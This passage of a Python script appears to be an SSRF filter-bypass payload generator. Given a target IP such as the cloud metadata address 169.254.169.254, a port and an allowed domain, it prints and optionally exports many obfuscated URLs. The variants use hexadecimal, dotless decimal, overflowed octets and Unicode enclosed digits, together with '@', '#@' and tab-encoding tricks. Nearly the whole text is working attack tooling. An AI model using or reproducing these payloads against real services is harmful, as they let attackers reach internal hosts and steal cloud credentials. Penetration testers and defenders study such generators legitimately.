'5' : ['⑤'],
|
||||||
|
'6' : ['⑥'],
|
||||||
|
'7' : ['⑦'],
|
||||||
|
'8' : ['⑧'],
|
||||||
|
'9' : ['⑨'],
|
||||||
|
'10' : ['⑩'],
|
||||||
|
'11' : ['⑪'],
|
||||||
|
'12' : ['⑫'],
|
||||||
|
'13' : ['⑬'],
|
||||||
|
'14' : ['⑭'],
|
||||||
|
'15' : ['⑮'],
|
||||||
|
'16' : ['⑯'],
|
||||||
|
'17' : ['⑰'],
|
||||||
|
'18' : ['⑱'],
|
||||||
|
'19' : ['⑲'],
|
||||||
|
'20' : ['⑳'],
|
||||||
|
'.' : ['。','。'],
|
||||||
|
'a' : ['ⓐ'],
|
||||||
|
'b' : ['ⓑ'],
|
||||||
|
'c' : ['ⓒ'],
|
||||||
|
'd' : ['ⓓ'],
|
||||||
|
'e' : ['ⓔ'],
|
||||||
|
'f' : ['ⓕ'],
|
||||||
|
'x' : ['ⓧ'],
|
||||||
|
}
|
||||||
|
|
||||||
|
def RANDOM_TEXT_SPEC():
|
||||||
|
min_char = 12
|
||||||
|
max_char = 16
|
||||||
|
chars = string.ascii_letters + string.digits + "!$%^&*()<>;:,.|\~`"
|
||||||
|
return "".join(choice(chars) for x in range(randint(min_char, max_char)))
|
||||||
|
|
||||||
|
def RANDOM_TEXT():
|
||||||
|
min_char = 12
|
||||||
|
max_char = 16
|
||||||
|
chars = string.ascii_letters + string.digits
|
||||||
|
return "".join(choice(chars) for x in range(randint(min_char, max_char)))
|
||||||
|
|
||||||
|
def DECIMAL_SINGLE(NUMBER,STEP):
|
||||||
|
return int(NUMBER)*(256**STEP)
|
||||||
|
|
||||||
|
def HEX_SINGLE(NUMBER,ADD0X):
|
||||||
|
if ADD0X == "yes":
|
||||||
|
return str(hex(int(NUMBER)))
|
||||||
|
else:
|
||||||
|
return str(hex(int(NUMBER))).replace("0x","")
|
||||||
|
|
||||||
|
def OCT_SINGLE(NUMBER):
|
||||||
|
return str(oct(int(NUMBER))).replace("o","")
|
||||||
|
|
||||||
|
def DEC_OVERFLOW_SINGLE(NUMBER):
|
||||||
|
return str(int(NUMBER)+256)
|
||||||
|
|
||||||
|
def validIP(address):
|
||||||
|
parts = address.split(".")
|
||||||
|
if len(parts) != 4:
|
||||||
|
return False
|
||||||
|
try:
|
||||||
|
for item in parts:
|
||||||
|
if not 0 <= int(item) <= 255:
|
||||||
|
return False
|
||||||
|
except ValueError:
|
||||||
|
print("\nUsage: python "+sys.argv[0]+" IP EXPORT(optional)\nUsage: python "+sys.argv[0]+" 169.254.169.254\nUsage: python "+sys.argv[0]+" 169.254.169.254 export")
|
||||||
|
exit(1)
|
||||||
|
return True
|
||||||
|
|
||||||
|
def plain2EnclosedAlphanumericsChar(s0):
|
||||||
|
if s0 not in EnclosedAlphanumericsData:
|
||||||
|
raise Exception('value not found')
|
||||||
|
return random.choice(EnclosedAlphanumericsData[s0])
|
||||||
|
|
||||||
|
def convertIP2EnclosedAlphanumericsValue():
|
||||||
|
IPAddressParts4EnclosedAlphanumerics = arg1.split(".")
|
||||||
|
returnEnclosedAlphanumericsIPAddress = ""
|
||||||
|
for x in range(0,4):
|
||||||
|
if len(IPAddressParts4EnclosedAlphanumerics[x]) == 3 and (int(IPAddressParts4EnclosedAlphanumerics[x][0]+IPAddressParts4EnclosedAlphanumerics[x][1])) <= 20 and (int(IPAddressParts4EnclosedAlphanumerics[x][0]+IPAddressParts4EnclosedAlphanumerics[x][1]+IPAddressParts4EnclosedAlphanumerics[x][2])) >= 10:
|
||||||
|
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][0]+IPAddressParts4EnclosedAlphanumerics[x][1]);
|
||||||
|
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][2]);
|
||||||
|
if x <= 2:
|
||||||
|
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar('.');
|
||||||
|
else:
|
||||||
|
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][0]);
|
||||||
|
if len(IPAddressParts4EnclosedAlphanumerics[x]) >= 2:
|
||||||
|
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][1]);
|
||||||
|
if len(IPAddressParts4EnclosedAlphanumerics[x]) == 3:
|
||||||
|
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][2]);
|
||||||
|
if x <= 2:
|
||||||
|
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar('.');
|
||||||
|
return returnEnclosedAlphanumericsIPAddress
|
||||||
|
|
||||||
|
def convert(s, recurse_chunks=True, error_on_miss=False):
|
||||||
|
if s in EnclosedAlphanumericsData:
|
||||||
|
return random.choice(EnclosedAlphanumericsData[s])
|
||||||
|
if recurse_chunks and len(s) > 1:
|
||||||
|
return convert(s[:-1]) + convert(s[-1])
|
||||||
|
if error_on_miss:
|
||||||
|
raise Exception('Value not found: %s' % s)
|
||||||
|
return s
|
||||||
|
|
||||||
|
def convert_ip(ip, sep='.'):
|
||||||
|
return convert(sep).join([convert(chunk) for chunk in ip.split(sep)])
|
||||||
|
|
||||||
|
if len(sys.argv) < 4 or len(sys.argv) >= 6:
|
||||||
|
print("\nUsage: python "+sys.argv[0]+" IP PORT WhiteListedDomain EXPORT(optional)\nUsage: python "+sys.argv[0]+" 169.254.169.254 80 www.google.com\nUsage: python "+sys.argv[0]+" 169.254.169.254 80 www.google.com export")
|
||||||
|
exit(1)
|
||||||
|
|
||||||
|
redcolor='\x1b[0;31;40m'
|
||||||
|
greencolor='\x1b[0;32;40m'
|
||||||
|
yellowcolor='\x1b[0;33;40m'
|
||||||
|
bluecolor='\x1b[0;36;40m'
|
||||||
|
resetcolor='\x1b[0m'
|
||||||
|
arg1 = str(sys.argv[1])
|
||||||
|
|
||||||
|
if validIP(arg1) == False:
|
||||||
|
print("\n",yellowcolor,arg1,resetcolor,redcolor," is not a valid IPv4 address in dotted decimal format, example: 123.123.123.123",resetcolor,sep='')
|
||||||
|
print("\nUsage: python "+sys.argv[0]+" IP EXPORT(optional)\nUsage: python "+sys.argv[0]+" 169.254.169.254\nUsage: python "+sys.argv[0]+" 169.254.169.254 export")
|
||||||
|
exit(1)
|
||||||
|
|
||||||
|
ipFrag3, ipFrag2, ipFrag1, ipFrag0 = arg1.split(".")
|
||||||
|
PORT=str(sys.argv[2])
|
||||||
|
RANDPREFIXTEXT=RANDOM_TEXT()
|
||||||
|
RANDPREFIXTEXTSPEC=RANDOM_TEXT_SPEC()
|
||||||
|
RANDOMPREFIXVALIDSITE=str(sys.argv[3])
|
||||||
|
FILENAME=''
|
||||||
|
|
||||||
|
try:
|
||||||
|
sys.argv[4]
|
||||||
|
except IndexError:
|
||||||
|
EXPORTRESULTS=''
|
||||||
|
else:
|
||||||
|
EXPORTRESULTS=str(sys.argv[4])
|
||||||
|
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
FILENAME = "export-" + arg1 + "-" + str(datetime.datetime.now().strftime("%H-%M-%d-%m-%Y"))+'.txt'
|
||||||
|
pythonversion = (platform.python_version())
|
||||||
|
major, minor, patchlevel = pythonversion.split(".")
|
||||||
|
if major == "3":
|
||||||
|
f = open(FILENAME, 'w')
|
||||||
|
else:
|
||||||
|
f = open(FILENAME, 'wb')
|
||||||
|
elif EXPORTRESULTS != '':
|
||||||
|
print("\nUsage: python "+sys.argv[0]+" IP WhiteListedDomain EXPORT(optional)\nUsage: python "+sys.argv[0]+" 169.254.169.254 80 www.google.com\nUsage: python "+sys.argv[0]+" 169.254.169.254 80 www.google.com export")
|
||||||
|
exit(1)
|
||||||
|
|
||||||
|
#Case 1 - Dotted hexadecimal
|
||||||
|
print("\n",sep='')
|
||||||
|
print(bluecolor,"Dotted hexadecimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP1 = HEX_SINGLE(ipFrag3,"yes") + "." + HEX_SINGLE(ipFrag2,"yes") + "." + HEX_SINGLE(ipFrag1,"yes") + "." + HEX_SINGLE(ipFrag0,"yes")
|
||||||
|
print('http://',IP1,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP1,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/','/',sep='')
|
||||||
|
print('http://',IP1,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP1,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP1,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP1,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP1,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP1,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP1,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP1,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP1,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP1,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP1,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':',PORT,'/',file=f,sep='')
|
||||||
|
#===========================================================================
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP1,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP1,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP1,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP1,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP1,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP1,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP1,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
#===========================================================================
|
||||||
|
|
||||||
|
#Case 2 - Dotless hexadecimal
|
||||||
|
print(bluecolor,"Dotless hexadecimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP2 = HEX_SINGLE(ipFrag3,"yes") + HEX_SINGLE(ipFrag2,"no") + HEX_SINGLE(ipFrag1,"no") + HEX_SINGLE(ipFrag0,"no")
|
||||||
|
print('http://',IP2,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP2,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP2,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP2,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP2,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP2,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP2,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP2,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP2,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP2,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP2,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP2,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP2,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP2,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP2,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP2,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP2,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP2,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP2,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP2,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 3 - Dotless decimal
|
||||||
|
print(bluecolor,"Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP3 = str(DECIMAL_SINGLE(ipFrag3,3) + DECIMAL_SINGLE(ipFrag2,2) + DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
|
||||||
|
print('http://',IP3,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP3,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP3,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP3,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP3,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP3,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP3,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP3,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP3,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP3,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP3,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP3,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP3,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP3,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP3,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP3,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP3,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP3,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP3,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP3,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 4 - Dotted decimal with overflow(256)
|
||||||
|
print(bluecolor,"Dotted decimal with overflow(256) IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP4 = DEC_OVERFLOW_SINGLE(ipFrag3) + "." + DEC_OVERFLOW_SINGLE(ipFrag2) + "." + DEC_OVERFLOW_SINGLE(ipFrag1) + "." + DEC_OVERFLOW_SINGLE(ipFrag0)
|
||||||
|
print('http://',IP4,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP4,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP4,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP4,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP4,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP4,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP4,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP4,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP4,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP4,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP4,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP4,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP4,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP4,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP4,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP4,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP4,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP4,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP4,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP4,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 5 - Dotted octal
|
||||||
|
